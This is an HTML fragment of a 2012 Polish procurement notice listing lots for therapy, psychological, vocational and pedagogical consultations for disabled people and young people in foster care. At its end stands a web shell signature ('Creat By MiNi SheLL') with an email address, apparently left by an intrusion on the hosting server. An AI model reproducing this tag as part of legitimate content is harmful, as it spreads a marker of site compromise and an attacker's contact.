<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Ergoterapia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> dla 17 osób niepełnosprawnych w stopniu znacznym lub umiarkowanym z tytułu niepełnosprawności umysłowej, psychicznej lub neurologicznej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Arteterapia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> dla 16 osób niepełnosprawnych w stopniu znacznym lub umiarkowanym z tytułu niepełnosprawności umysłowej, psychicznej lub neurologicznej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Indywidualne konsultacje psychologiczne przed skierowaniem na kursy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dla  49 uczestników w tym 39 osób niepełnosprawnych oraz 10 usamodzielnianych wychowanków  placówek opiekuńczo wychowawczych i rodzin zastępczych uczestnika..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.12.12.70-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.09.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Indywidualne konsultacje psychologiczne dla osób niepełnosprawnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dla  30 osób niepełnosprawnych.
Łącznie 120h konsultacji psychologicznych po 4 godz. na uczestnika..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.12.12.70-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Indywidualne konsultacje psychologiczne dla usamodzielnianych wychowanków placówek opiekuńczo - wychowawczych lub rodzin zastępczych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dla  10 usamodzielnianych wychowanków placówek opiekuńczo wychowawczych lub rodzin zastępczych. 
Łącznie 40h konsultacji psychologicznych po 4 godz. na uczestnika..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.12.12.70-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Terapia psychologiczna dla młodzieży przebywającej w placówkach opiekuńczo - wychowawczych lub rodzinach zastępczych..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dla  14 osób przebywających w placówkach opiekuńczo wychowawczych lub rodzinach zastępczych. 
 Łącznie 56h konsultacji psychologicznych po 4 godz. na uczestnika..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.12.12.70-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Terapia psychologiczna dla rodzin zastępczych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> dla 3 rodzin zastępczych - łącznie 15 godzin konsultacji.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.12.12.70-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Indywidualne konsultacje z doradcą zawodowym przed skierowaniem na kursy zawodowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dla  49 uczestników w tym 39 osób niepełnosprawnych oraz 10 usamodzielnianych wychowanków  placówek opiekuńczo wychowawczych i rodzin zastępczych uczestnika
 Łącznie 49h konsultacji z doradcą zawodowym po 1 godz. na uczestnika..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Indywidualne konsultacje z doradcą zawodowym dla osób niepełnosprawnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dla  30 niepełnosprawnych uczestników.
Łącznie 90h konsultacji z doradcą zawodowym po 3 godz. na uczestnika..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Indywidualne konsultacje z doradcą zawodowym dla młodzieży.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dla  10 usamodzielnianych wychowanków placówek opiekuńczo - wychowawczych i rodzin zastępczych oraz dla 14 osób przebywających w rodzinach zastępczych lub placówkach opiekuńczo wychowawczych.   Łącznie 72h konsultacji z doradcą zawodowym po 3 godz. na uczestnika..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> konsultacje pedagogiczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dla  24 uczestników, w tym 10 usamodzielnianych wychowanków placówek opiekuńczo wychowawczych lub rodzin zastępczych oraz 14 osób przebywających w placówkach opiekuńczo - wychowawczych lub w rodzinach zastępczych w wieku od 15 do 25 lat. (osoby uczące się)
 Łącznie 96h konsultacji z pedagogiem po 4 godz. na uczestnika..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com